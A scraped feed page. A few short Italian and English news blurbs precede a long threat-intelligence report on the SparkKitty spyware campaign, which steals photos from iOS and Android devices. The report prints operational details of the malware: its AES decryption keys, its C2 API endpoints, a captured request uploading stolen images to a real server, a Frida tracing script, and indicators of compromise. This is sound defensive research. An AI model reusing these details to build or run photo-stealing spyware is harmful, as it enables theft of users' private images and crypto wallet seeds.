Le autorità stanno intensificando le attività di prevenzione: vengono pubblicate raccomandazioni per genitori e insegnanti per aiutarli a individuare tempestivamente i segnali d’allarme. Cambiamenti improvvisi nel comportamento, la comparsa di oggetti costosi senza una causa apparente. Europol sottolinea che un intervento precoce può salvare gli adolescenti da un percorso pericoloso.
L’indagine è in corso. L’obiettivo è trovare gli organizzatori e chiudere i canali che trasformano le chat sicure in strumenti di influenza criminale.
L'articolo Omicidi come un drink! Il dark web recluta ragazzini con App crittografate in Europa proviene da il blog della sicurezza informatica.
Luisella doesn't like this.
Gestione incidenti ICT: i 6 criteri di classificazione e soglie di rilevanza per valutarne la gravità
@Informatica (Italy e non Italy 😁)
L’articolo 18 del Regolamento DORA dà mandato a BCE, Enisa e AEV al fine di elaborare un progetto di norme tecniche ed evitare che gli incidenti Ict si ripetano. A che punto siamo dopo la piena applicazione della normativa
L'articolo Gestione incidenti
Informatica (Italy e non Italy 😁) reshared this.
Patente a crediti per la sicurezza sul lavoro: il Garante Privacy spiega cosa correggere
@Informatica (Italy e non Italy 😁)
Il Garante Privacy ha dato il via libera allo schema di decreto sulla patente a crediti per le imprese e i lavoratori autonomi che operano nei cantieri temporanei o mobili. Ecco cosa disciplina il decreto, i dettagli e i passaggi
Informatica (Italy e non Italy 😁) reshared this.
Nato, ripensare il 2% per una nuova soglia di sicurezza europea. L’analisi di Cesa
@Notizie dall'Italia e dal mondo
L’obiettivo del 2% del Pil in spesa per la difesa, fissato dalla Nato nel 2014 dopo l’annessione della Crimea, fu adeguato per il contesto di allora. Ma oggi quel quadro è cambiato: la guerra in Ucraina ha trasformato una minaccia potenziale in realtà. La
Notizie dall'Italia e dal mondo reshared this.
French Administrative Supreme Court illegitimately buries the debate over internet censorship law
In November 2023, EDRi and members filed a complaint against the French decree implementing the EU regulation addressing the dissemination of 'terrorist content' online. Last week, the French supreme administrative court rejected our arguments and refused to refer the case to the Court of Justice of the European Union.
The post French Administrative Supreme Court illegitimately buries the debate over internet censorship law appeared first on European Digital Rights (EDRi).
freezonemagazine.com/news/the-…
A vent’anni, mentre stava curiosando alla Colony Records di New York, Mick Jagger si imbatté in un LP della Arhoolie Records di Clifton Chenier che presentava la musica da ballo creola del sud-ovest della Louisiana, che fonde la musica tradizionale francese, i ritmi caraibici e l’R&B americano. Prima
Luisella doesn't like this.
freezonemagazine.com/articoli/…
Questo è un romanzo unico, per la sua gestazione, le sue vicissitudini, per la scrittura e per il carattere dell’autore. Nicola Pugliese affermò di averlo scritto in quarantacinque giorni quasi
Visual Code Generator to End All Generators
QR codes are something that we all take for granted in this day and age. There are even a million apps to create your own QR codes, but what if you want to make a barcode? How about making a specific kind of barcode that follows UPC-E, CODE 39, or even the infamous… CODABAR? Well, it might be more difficult to find a single app that can handle all those different standards. Using “yet-another-web-app”, Barcode Tool – Generator & Scanner, you can rid these worries, created by [Ricardo de Azambuja].
When going to [Ricardo]’s simple application, you will find a straightforward interface that allows you to make far more different strips and square patterns than you’ve ever imagined. Of course, starting with the common QR code, you can create custom overlaid codes like many other QR generators. More uniquely, there are options for any barcode under the sun to help organize your hacker workspace. If you don’t want to download an app to scan the codes, you can even use the included scanner function.
If you want to use the web app, you can find it here! In-depth solutions to rather simple problems are something we strive to provide here at Hackaday, and this project is no exception. However, if you want something more physical, check out this specialized outdoor city cooking station.
SparkKitty, SparkCat’s little brother: A new Trojan spy found in the App Store and Google Play
In January 2025, we uncovered the SparkCat spyware campaign, which was aimed at gaining access to victims’ crypto wallets. The threat actor distributed apps containing a malicious SDK/framework. This component would wait for a user to open a specific screen (typically a support chat), then request access to the device’s gallery. It would then use an OCR model to select and exfiltrate images of interest. Although SparkCat was capable of searching for any text within images, that campaign specifically targeted photos containing seed phrases for crypto wallets. The malware was distributed through unofficial sources as well as Google Play and App Store. Now, we’ve once again come across a new type of spyware that has managed to infiltrate the official app stores. We believe it is connected to SparkCat and also targets the cryptocurrency assets of its victims.
Here are the key facts about this new threat:
- The malware targets both iOS and Android devices, and it is spreading in the wild as well as through the App Store and Google Play.
- On iOS, the malicious payload is delivered as frameworks (primarily mimicking AFNetworking.framework or Alamofire.framework) or obfuscated libraries disguised as libswiftDarwin.dylib, or it can be embedded directly into the app itself.
- The Android-specific Trojan comes in both Java and Kotlin flavors; the Kotlin version is a malicious Xposed module.
- While most versions of this malware indiscriminately steal all images, we discovered a related malicious activity cluster that uses OCR to pick specific pictures.
- The campaign has been active since at least February 2024.
It all began with a suspicious online store…
During routine monitoring of suspicious links, we stumbled upon several similar-looking pages that were distributing TikTok mods for Android. In these modified versions, the app’s main activities would trigger additional code. The code would then request a Base64-encoded configuration file from hxxps://moabc[.]vip/?dev=az. A sample decoded configuration file is shown below.
{
"links": {
"shopCenter": "https://h1997.tiktokapp.club/wap/?",
"goodsList": "https://h1997.tiktokapp.club/www/?",
"orderList": "https://h1997.tiktokapp.club/www/?",
"reg": "https://www.baidu.com",
"footbar": "https://www.baidu.com"
}
}
The links from the configuration file were displayed as buttons within the app. Tapping these opened WebView, revealing an online store named TikToki Mall that accepted cryptocurrency as payment for consumer goods. Unfortunately, we couldn’t verify if it was a legitimate store, as users had to register with an invitation code to make a purchase.
Although we didn’t find any other suspicious functionality within the apps, a gut feeling told us to dig deeper. We decided to examine the code of the web pages distributing the apps, only to find a number of interesting details suggesting they might also be pushing iOS apps.
<div class="t-name">
<div class="tit">
{{if ext=="ipa"}}
<i class="iconfont icon-iphone" style="font-size:inherit;margin-right:5px"></i>
{{else}}
<i class="iconfont icon-android" style="font-size:inherit;margin-right:5px"></i>
{{/if}}
iOS app delivery method
And sure enough, visiting the website on an iPhone triggers a series of redirects, ultimately landing the user on a page that crudely mimics the App Store and prompts them to download an app.
iOS app download page
As you know, iOS doesn’t just let you download and run any app from a third-party source. However, Apple provides members of the Apple Developer Program with so-called provisioning profiles. These allow a developer certificate to be installed on a user device. iOS then uses this certificate to verify the app’s digital signature and determine if it can be launched. Besides the certificate, a provisioning profile contains its expiration date and the permissions to be granted to the app, as well as other information about the developer and the app. Once the profile is installed on a device, the certificate becomes trusted, allowing the app to run.
Provisioning profiles come in several types. Development profiles are used for testing apps and can only be distributed to a predefined set of devices. App Store Connect profiles allow for publishing an app to the App Store. Enterprise profiles were created to allow organizations to develop internal-use apps and install them on their employees’ devices without publishing them on the App Store and without any restrictions on which devices they can be installed on. Although the Apple Developer Program requires a paid membership and developer verification by Apple, Enterprise profiles are often exploited. They are used not only by developers of apps unsuitable for the App Store (online casinos, cracks, cheats, or illegal mods of popular apps) but also by malware creators.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>AppIDName</key>
<string>rdcUniApp</string>
<key>ApplicationIdentifierPrefix</key>
<array>
<string>EHQ3N2D5WH</string>
</array>
<key>CreationDate</key>
<date>2025-01-20T06:59:55Z</date>
<key>Platform</key>
<array>
<string>iOS</string>
<string>xrOS</string>
<string>visionOS</string>
</array>
<key>IsXcodeManaged</key>
<false/>
<key>DeveloperCertificates</key>
<array>
<data>OMITTED</data>
</array>
<key>DER-Encoded-Profile</key>
<data>OMITTED</data>
<key>Entitlements</key>
<dict>
<key>application-identifier</key>
<string>EHQ3N2D5WH.com.ss-tpc.rd.rdcUniApp</string>
<key>keychain-access-groups</key>
<array>
<string>EHQ3N2D5WH.*</string>
<string>com.apple.token</string>
</array>
<key>get-task-allow</key>
<false/>
<key>com.apple.developer.team-identifier</key>
<string>EHQ3N2D5WH</string>
</dict>
<key>ExpirationDate</key>
<date>2026-01-20T06:59:55Z</date>
<key>Name</key>
<string>syf</string>
<key>ProvisionsAllDevices</key>
<true/>
<key>TeamIdentifier</key>
<array>
<string>EHQ3N2D5WH</string>
</array>
<key>TeamName</key>
<string>SINOPEC SABIC Tianjin Petrochemical Co. Ltd.</string>
<key>TimeToLive</key>
<integer>365</integer>
<key>UUID</key>
<string>55b65f87-9102-4cb9-934a-342dd2be8e25</string>
<key>Version</key>
<integer>1</integer>
</dict>
</plist>
Example of a provisioning profile installed to run a malicious TikTok mod
In the case of the malicious TikTok mods, the attackers used an Enterprise profile, as indicated by the following key in its body:
<key>ProvisionsAllDevices</key>
<true/>
It’s worth noting that installing any provisioning profile requires direct user interaction, which looks like this:
Profile installation flow
Looking for copper, found gold
Just like its Android counterpart, the installed iOS app contained a library that embedded links to a suspicious store within the user’s profile window. Tapping these opened them in WebView.
Suspicious store opened inside a TikTok app
It seemed like a straightforward case: another mod of a popular app trying to make some money. However, one strange detail in the iOS version caught our attention. On every launch, the app requested access to the user’s photo gallery – highly unusual behavior for the original TikTok. Furthermore, the library containing the store didn’t have code accessing the photo gallery, and the Android version never requested image permissions. We were compelled to dig a little deeper and examine the app’s other dependencies. This led to the discovery of a malicious module pretending to be AFNetworking.framework. For a touch of foreshadowing, let’s spotlight a curious detail: certain apps referred to it as Alamofire.framework, but the code itself stayed exactly the same. The original version of AFNetworking is an open-source library that provides developers with a set of interfaces for convenient network operations.
The malicious version differs from the original by a modified AFImageDownloader class and an added AFImageDownloaderTool class. Interestingly, the authors didn’t create separate initialization functions or alter the library’s exported symbols to launch the malicious payload. Instead, they took advantage of a feature in Objective-C that allows classes to define a special load selector, which is automatically called when the app is loading. In this case, the entry point for the malicious payload was the +[AFImageDownloader load] selector, which does not exist in the original framework.
Malicious class entry point
The malicious payload functions as follows:
- It checks if the value of the
ccoolkey in the app’s main Info.plist configuration file matches the string77e1a4d360e17fdbc. If the two differ, the malicious payload will not proceed. - It retrieves the Base64-encoded value of the
ccckey from the framework’s Info.plist file. This value is decoded and then decrypted using AES-256 in ECB mode with the keyp0^tWut=pswHL-x>>:m?^.^)Wpadded with nulls to reach a length of 32 bytes. Some samples were also observed using the keyJ9^tMnt=ptfHL-x>>:m!^.^)A. If there’s noccckey in the configuration or the key’s value is empty, the malware attempts to use the keycom.tt.cfto retrieve an encrypted string from UserDefaults – a database where the app can store information for use in subsequent launches. - The decrypted value is a list of URLs from which the malware fetches additional payloads, encrypted using the same method. This new ciphertext contains a set of C2 addresses used for exfiltrating stolen photos.
- The final step before uploading the photos is to receive authorization from the C2 server. To do this, the malware sends a GET request to the /api/getImageStatus endpoint, transmitting app details and the user’s UUID. The server responds with the following JSON:{"msg":"success","code":0,"status":"1"}The
codefield tells the app whether to repeat the request after a delay, with 0 meaning no, and thestatusfield indicates whether it has permission to upload the photos. - Next, the malware requests access to the user’s photo gallery. It then registers a callback function to monitor for any changes within the gallery. The malware exfiltrates any accessible photos that have not already been uploaded. To keep track of which photos have been stolen, it creates a local database. If the gallery is modified while the app is running, the malware will attempt to access and upload the new images to the C2 server.
Photo exfiltration and upload
Data transmission is performed directly within the selector [AFImageDownloader receiptID:andPicID:] by making a PUT request to the /api/putImages endpoint. In addition to the image itself, information about the app and the device, along with unique user identifiers, is also sent to the server.
PUT /api/putImages HTTP/1.1
Host: 23.249.28.88:7777
Content-Type: multipart/form-data; boundary=Boundary+C9D8BE3781515E01
Connection: keep-alive
Accept: */*
User-Agent: TikTok/31.4.0 (iPhone; iOS 14.8; Scale/3.00)
Accept-Language: en-US;q=1, ja-US;q=0.9, ar-US;q=0.8, ru-US;q=0.7
Content-Length: 80089
Accept-Encoding: gzip, deflate
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="appname"
TikTok
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="buid"
com.zhiliaoapp.musically
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="device"
ios
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="userId"
xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="uuid"
xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/Lx/xxx
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="image"; filename="<name>"
Content-Type: image/jpeg
......JFIF.....H.H.....LExif..MM.*...................i.........&.................e.......... ........8Photoshop 3.0.8BIM........8BIM.%................ ...B~...4ICC_PROFILE......$appl....mntrRGB XYZ .......
Digging deeper
When we found a spyware component in the modified iOS version of TikTok, we immediately wondered if the Trojan had an Android counterpart. Our initial search led us to a bunch of cryptocurrency apps. These apps had malicious code embedded in their entry points. It requests a configuration file with C2 addresses and then decrypts it using AES-256 in ECB mode. These decrypted addresses are then used by the Trojan to send a GET request to /api/anheartbeat. The request includes information about the infected app. The Trojan expects a JSON response. If the code field is 0, it means communication with that C2 is allowed. The status flag in the JSON determines whether the Trojan can send the victim’s images to the server.
Checking C2 addresses
The main functionality of this malware – stealing images from the gallery – works in two stages. First, the malware checks the status flag. If it’s set to allow file uploads, the Trojan then checks the contents of a file named aray/cache/devices/.DEVICES on external storage. The first time it runs, the Trojan writes a hexadecimal number to this file. The number is an MD5 hash of a string containing the infected device’s IMEI, MAC address, and a random UUID. The content of this file is then compared to the string B0B5C3215E6D. If the content is different, the Trojan uploads images from the gallery, along with infected device info, to the command server via a PUT request to /api/putDataInfo. If the content is the same, it only uploads the third image from the end of an alphabetically sorted list. It’s highly likely the attackers use this specific functionality for debugging their malicious code.
Uploading image and device information
Later, we discovered other versions of this Trojan embedded in casino apps. These were loaded using the LSPosed framework, which is designed for app code hooking. Essentially, these Trojan versions acted as malicious Xposed modules. They would hook app entry points and execute code similar to the malware we described earlier, but with a few interesting twists:
- The C2 address storage was located in both the module’s resources and directly within the malware code. Typically, these were two different addresses, and both were used to obtain C2 information.
Procedure for obtaining C2 addresses
- Among the decrypted C2 addresses, the Trojan picks the one corresponding to the fastest server. It does this by sending a request to each server sequentially. If the request is successful, it records the response time. The shortest time then determines which C2 server is used. Note that this algorithm could have been implemented without needing to store intermediate values.
Finding the shortest response time
- The code uses custom names for classes, methods, and fields.
- It is written in Kotlin. Other versions we found were written in Java.
Spyware in official app stores
One of the Android Java apps containing a malicious payload was a messaging app with crypto exchange features. This app was uploaded to Google Play and installed over 10,000 times. It was still available in the store at the time of this research. We notified Google about it.
Infected app on Google Play
Another infected Android app we discovered is named 币coin and distributed through unofficial sources. However, it also has an iOS version. We found it on the App Store and alerted Apple to the presence of the infected app in their store.
Infected app page on the App Store
In both the Android and iOS versions, the malicious payload was part of the app itself, not of a third-party SDK or framework. In the iOS version, the central AppDelegate class, which manages the app’s lifecycle, registers its selector [AppDelegate requestSuccess:] as a handler for responses returned by requests sent to i.bicoin[.]com[.]cn.
Checking the server response and sending a photo
{
code = 0;
data = {
27 = (
);
50002 = (
{
appVersion = "";
cTime = 1696304011000;
id = 491;
imgSubTitle = "";
imgTitle = "\U70ed\U5f00\U5173\Uff08\U65b0\Uff09";
imgType = 50002;
imgUrl = 0;
imgUrlSub = "";
isFullScreen = 0;
isNeed = 1;
isSkip = 1;
langType = all;
operator = 0;
skipUrl = "";
sort = 10000;
source = 0;
type = 0;
uTime = <timestamp>;
}
);
};
dialog = {
cancelAndClose = 0;
cancelBtn = "";
cancelColor = "";
code = 0;
confirmBtn = "";
confirmColor = "";
content = "";
contentColor = "";
time = "";
title = OK;
titleColor = "";
type = 3;
url = "";
};Sample server response
In the response, the imgUrl field contains information about the permission to send photos (1 means granted). Once the Trojan gets the green light, it uses a similar method to what we described earlier: it downloads an encrypted set of C2 addresses and tries sending the images to one of them. By default, it’ll hit the first address on the list. If that one’s down, the malware just moves on to the next. The photo-sending functionality is implemented within the KYDeviceActionManager class.
Retrieving and sending photos
Suspicious libcrypto.dylib mod
During our investigation, we also stumbled upon samples that contained another suspicious library: a modified version of OpenSSL’s cryptographic primitives library, libcrypto.dylib. It showed up under names like wc.dylib and libswiftDarwin.dylib, had initialization functions that were obfuscated with LLVM, and contained a link to a configuration we’d seen before in other malicious frameworks. It also imported the PHPhotoLibrary class, used for gallery access in the files we mentioned earlier. Sometimes the library was delivered alongside the malicious AFNetworking.framework/Alamofire.framework, sometimes not.
Unlike other variants of this malware, this particular library didn’t actually reach out to the malicious configuration file link embedded within it. That meant we had to manually dig for the code responsible for its initial communication with the C2. Even though these library samples are heavily obfuscated, some of them, like the sample with the hash c5be3ae482d25c6537e08c888a742832, still had cross-references to the part of the code where the encrypted configuration page URL was used. This function converted a URL string into an NSString object.
Section of obfuscated code for loading the malicious URL
Using Frida, we can execute any piece of code as a function, but simply converting a string to an NSString object isn’t enough to confirm the library’s malicious intent. So, we followed the cross-references up several levels. When we tried to execute the function that worked with the URL during its execution, we discovered it was making a GET request to the malicious URL. However, we couldn’t get a response right away; the server the URL pointed to was already inactive. To make the function run correctly, we used Frida to substitute the link with a working one, where we knew exactly what data it returned and how it was decrypted. By setting logging hooks on the objc_msgSend call and running the malicious function with a swapped URL, we got the info we needed about the calls. Below is the Frida script we used to do this:
function traceModule(impl, name)
{
console.log("Tracing " + name, impl);
var exit_log = 0;
Interceptor.attach(impl, {
onEnter: function(args) {
var bt = Thread.backtrace(this.context, Backtracer.ACCURATE);
if (!moduleMap) {
moduleMap = new ModuleMap();
}
var modules = bt.map(x => moduleMap.find(x)).filter(x => x != null).map(x => x.name);
// we want to trace only calls originating from malware dylib
if (modules.filter(x => x.includes('wc.dylib')).length > 0) {
exit_log = 1;
console.warn("\n*** entering " + name);
if(name.includes('objc_msgSend')) {
var sel = this.context.x1.readUtf8String();
if (sel.includes("stringWithCString:")) {
var s = this.context.x2.readUtf8String();
if (s.includes('.cn-bj.ufileos.com')) {
console.log("Replacing URL: ", s);
var news = Memory.allocUtf8String('https://data-sdk2.oss-accelerate.aliyuncs.com/file/SGTMnH951121');
this.context.x2 = news;
console.log("New URL: ", this.context.x2.readUtf8String());
}
else
console.log(s);
}
}
//print backtrace
console.log(bt.map(DebugSymbol.fromAddress).join("\n"));
}
},
onLeave: function(retval) {
if (exit_log == 1) {
console.warn("\n***extiting ", name);
console.log(this.context.x0.readByteArray(64));
}
}
});
}
var malInited = false;
var malFunc;
function callMalware() {
if (!malInited) {
malFunc = new NativeFunction(base.add(0x7A77CC), 'void', []);
traceModule(base.add(0x821360), 'objc_msgSend');
malInited = true;
}
malFunc();
}
var mname = "wc.dylib";
var base = Process.enumerateModules().filter(x=>x.name.includes(mname))[0].base;
console.log('Base address: ', base);
malFunc();
Our suspicions were confirmed: the malicious function indeed loads and decrypts the C2 address configuration from a given URL. It then uses this C2 for sending device data, following the same pattern we described earlier and using the same AES-256 key. Below is an excerpt from the function’s execution logs.
*** entering objc_msgSend
### Creating NSString object with decrypted string
[ 0x20193a010 stringWithCString:"http://84.17.37.155:8081" encoding: ]
0x102781be8 wc.dylib!0x7d1be8 (0x7d1be8)
0x1027590e8 wc.dylib!0x7a90e8 (0x7a90e8)
*** entering objc_msgSend
### Creating NSString with api endpoint decrypted somewhere in code
[ 0x20193a010 stringWithCString:"%@/api/getStatus?buid=%@&appname=%@&userId=%@" encoding: ]
0x10277cc50 wc.dylib!0x7ccc50 (0x7ccc50)
0x102783264 wc.dylib!0x7d3264 (0x7d3264)
### Here sample initiates HTTP request to decrypted C2 address and decrypts its response ###
*** entering objc_msgSend
### Getting server response as data object
[ 0x2022d5078 initWithData:encoding: ]
0x10277f4a4 wc.dylib!0x7cf4a4 (0x7cf4a4)
0x1afafcac4 CFNetwork!0x1dac4 (0x180a6cac4)
*** leaving objc_msgSend
### Server response in bytes
00000000 41 e9 92 01 a2 21 00 00 8c 07 00 00 01 00 00 00 A....!..........
00000010 2e 7b 22 6d 73 67 22 3a 22 73 75 63 63 65 73 73 .{"msg":"success
00000020 22 2c 22 63 6f 64 65 22 3a 30 2c 22 75 73 22 3a ","code":0,"us":
00000030 31 2c 22 73 74 61 74 75 73 22 3a 22 30 22 7d 00 1,"status":"0"}.
The function execution log above clearly shows it uses an IP address from the encrypted configuration file. Device data is sent to this IP’s /api/getStatus endpoint with arguments familiar from previous samples. We also see that the server’s response contains the code and status fields we’ve encountered before. All of this strongly suggests that this library is also involved in stealing user photos. The only thing we haven’t pinpointed yet is the exact conditions under which this malicious function activates. At startup, the library contacts a C2 whose address in encrypted within it, sending device information and expecting a JSON string response from the server. At the time of this research, we hadn’t found any samples with an active C2 address, so we don’t know the precise response it’s looking for. However, we assume that response – or subsequent responses – should contain the permission to start sending photos.
Another activity cluster?
During our research, we stumbled upon a significant number of pages offering for download various scam iOS apps in the PWA (progressive web app) format. At first glance, these pages seemed unrelated to the campaign we describe in this article. However, their code bore a striking resemblance to the pages distributing the malicious TikTok version, which prompted us to investigate how users were landing on them. While digging into the traffic sources, we uncovered ads for various scams and Ponzi schemes on popular platforms.
Scam platform account on YouTube
Some of these PWA-containing pages also included a section prompting users to download a mobile app. For Android users, the link downloaded an APK file that opened the scam platform via WebView.
App download links
Beyond just opening scam websites in WebView, these downloaded APKs had another function. The apps requested access to read storage. Once this was granted, they used the Loader API to register their content download event handler. This handler then selected all JPEG and PNG images. The images were processed using the Google ML Kit library designed for optical character recognition. ML Kit searched for text blocks and then broke them down into lines. If at least three lines containing a word with a minimum of three letters were found, the Trojan would send the image to the attackers’ server – its address was retrieved from Amazon AWS storage.
Code snippet for photo uploads
We’re moderately confident that this activity cluster is connected to the one described above. Here’s why:
- The malicious apps also focus on cryptocurrency themes.
- Similar tactics are employed: the C2 address is also hosted in cloud storage, and gallery content is exfiltrated.
- The pages distributing iOS PWAs look similar to those used to download malicious TikTok mods.
Given this connection between the two activity clusters, we suspect the creators of the apps mentioned earlier might also be spreading them through social media ads.
Campaign goals and targets
Unlike SparkCat, the spyware we analyzed above doesn’t show direct signs of the attackers being interested in victims’ crypto assets. However, we still believe they’re stealing photos with that exact goal in mind. The following details lead us to these conclusions:
- A crypto-only store was embedded within the TikTok app alongside the spyware.
- Among the apps where the spyware was found, several were crypto-themed. For instance, 币coin in the App Store positions itself as a crypto information tracker, and the SOEX messaging app has various crypto-related features as well.
- The main source for distributing the spyware is a network of cookie-cutter app download platforms. During our investigation, we found a significant number of domains that distributed both the described Trojan and PWAs (progressive web apps). Users were directed to these PWAs from various cryptocurrency scam and Ponzi scheme sites.
Our data suggests that the attackers primarily targeted users in Southeast Asia and China. Most of the infected apps we discovered were various Chinese gambling games, TikTok, and adult games. All these apps were originally aimed specifically at users in the regions mentioned above.
Furthermore, we believe this malware is linked to the SparkCat campaign, and here’s our reasoning:
- Some Android apps infected with SparkKitty were built with the same framework as the apps infected with SparkCat.
- In both campaigns, we found the same infected Android apps.
- Within the malicious iOS frameworks, we found debug symbols. They included file paths from the attackers’ systems, which pointed to where their projects were being built. These paths match what we previously observed in SparkCat.
Takeaways
Threat actors are still actively compromising official app stores, and not just for Android – iOS is also a target. The espionage campaign we uncovered uses various distribution methods: it spreads through apps infected with malicious frameworks/SDKs from unofficial sources, as well as through malicious apps directly on the App Store and Google Play. While not technically or conceptually complex, this campaign has been ongoing since at least the beginning of 2024 and poses a significant threat to users. Unlike the previously discovered SparkCat spyware, this malware isn’t picky about which photos it steals from the gallery. Although we suspect the attackers’ main goal is to find screenshots of crypto wallet seed phrases, other sensitive data could also be present in the stolen images.
Judging by the distribution sources, this spyware primarily targets users in Southeast Asia and China. However, it doesn’t have any technical limitations that would prevent it from attacking users in other regions.
Our security products return the following verdicts when detecting malware associated with this campaign:
- HEUR:Trojan-Spy.AndroidOS.SparkKitty.*
- HEUR:Trojan-Spy.IphoneOS.SparkKitty.*
Indicators of compromise
Infected Android apps
b4489cb4fac743246f29abf7f605dd15
e8b60bf5af2d5cc5c501b87d04b8a6c2
aa5ce6fed4f9d888cbf8d6d8d0cda07f
3734e845657c37ee849618e2b4476bf4
fa0e99bac48bc60aa0ae82bc0fd1698d
e9f7d9bc988e7569f999f0028b359720
a44cbed18dc5d7fff11406cc403224b9
2dc565c067e60a1a9656b9a5765db11d
66434dd4402dfe7dda81f834c4b70a82
d851b19b5b587f202795e10b72ced6e1
ce49a90c0a098e8737e266471d323626
cc919d4bbd3fb2098d1aeb516f356cca
530a5aa62fdcca7a8b4f60048450da70
0993bae47c6fb3e885f34cb9316717a3
5e15b25f07020a5314f0068b474fff3d
1346f987f6aa1db5e6deb59af8e5744a
Infected iOS apps
21ef7a14fee3f64576f5780a637c57d1
6d39cd8421591fbb0cc2a0bce4d0357d
c6a7568134622007de026d22257502d5
307a64e335065c00c19e94c1f0a896f2
fe0868c4f40cbb42eb58af121570e64d
f9ab4769b63a571107f2709b5b14e2bc
2b43b8c757c872a19a30dcdcff45e4d8
0aa1f8f36980f3dfe8884f1c6f5d6ddc
a4cca2431aa35bb68581a4e848804598
e5186be781f870377b6542b3cecfb622
2d2b25279ef9365420acec120b98b3b4
149785056bf16a9c6964c0ea4217b42b
931399987a261df91b21856940479634
Malicious iOS frameworks
8c9a93e829cba8c4607a7265e6988646
b3085cd623b57fd6561e964d6fd73413
44bc648d1c10bc88f9b6ad78d3e3f967
0d7ed6df0e0cd9b5b38712d17857c824
b0eda03d7e4265fe280360397c042494
fd4558a9b629b5abe65a649b57bef20c
1b85522b964b38de67c5d2b670bb30b1
ec068e0fc6ffda97685237d8ab8a0f56
f10a4fdffc884089ae93b0372ff9d5d1
3388b5ea9997328eb48977ab351ca8de
931085b04c0b6e23185025b69563d2ce
7e6324efc3acdb423f8e3b50edd5c5e5
8cfc8081559008585b4e4a23cd4e1a7f
Obfuscated malicious iOS libraries
0b7891114d3b322ee863e4eef94d8523
0d09c4f956bb734586cee85887ed5407
2accfc13aaf4fa389149c0a03ce0ee4b
5b2e4ea7ab929c766c9c7359995cdde0
5e47604058722dae03f329a2e6693485
9aeaf9a485a60dc3de0b26b060bc8218
21a257e3b51561e5ff20005ca8f0da65
0752edcf5fd61b0e4a1e01371ba605fd
489217cca81823af56d141c985bb9b2c
b0976d46970314532bc118f522bb8a6f
f0460bdca0f04d3bd4fc59d73b52233b
f0815908bafd88d71db660723b65fba4
6fe6885b8f6606b25178822d7894ac35
Download links for infected apps
hxxps://lt.laoqianf14[.]top/KJnn
hxxps://lt.laoqianf15[.]top/KJnn
hxxps://lt.laoqianf51[.]top/KJnn
hxxps://yjhjymfjnj.wyxbmh[.]cn/2kzos8?a45dd02ac=d4f42319a78b6605cabb5696bacb4677
hxxps://xt.xinqianf38[.]top/RnZr
Pages distributing Trojans
hxxps://accgngrid[.]com
hxxps://byteepic[.]vip
C2 and configuration storage
C2:
23.249.28[.]88
120.79.8[.]107
23.249.28[.]200
47.119.171[.]161
api.fxsdk.com
Configurations
hxxp://120.78.239[.]17:10011/req.txt
hxxp://39.108.186[.]119:10011/req.txt
hxxps://dhoss-2023.oss-cn-beijing.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
hxxps://sdk-data-re.oss-accelerate.aliyuncs[.]com/JMUCe7txrHnxBr5nj.txt
hxxps://gitee[.]com/bbffipa/data-group/raw/master/02WBUfZTUvxrTMGjh7Uh
hxxps://ok2025-oss.oss-cn-shenzhen.aliyuncs[.]com/ip/FM4J7aWKeF8yK
hxxps://file-ht-2023.oss-cn-shenzhen.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
hxxps://afwfiwjef-mgsdl-2023.oss-cn-shanghai.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
hxxps://zx-afjweiofwe.oss-cn-beijing.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
hxxps://dxifjew2.oss-cn-beijing.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
hxxps://sdk-data-re.oss-accelerate.aliyuncs[.]com/JMUCe7txrHnxBr5nj.txt
hxxps://data-sdk2.oss-accelerate.aliyuncs[.]com/file/SGTMnH951121
hxxps://1111333[.]cn-bj.ufileos[.]com/file/SGTMnH951121
hxxps://tbetter-oss.oss-accelerate.aliyuncs[.]com/ip/CF4J7aWKeF8yKVKu
hxxps://photo-php-all.s3[.]ap-southeast-1.amazonaws[.]com/app/domain.json
hxxps://c1mon-oss.oss-cn-hongkong.aliyuncs[.]com/J2A3SWc2YASfQ2
hxxps://tbetter-oss.oss-cn-guangzhou.aliyuncs[.]com/ip/JZ24J7aYCeNGyKVF2
hxxps://data-sdk.oss-accelerate.aliyuncs[.]com/file/SGTMnH951121
Paths
/sdcard/aray/cache/devices/.DEVICES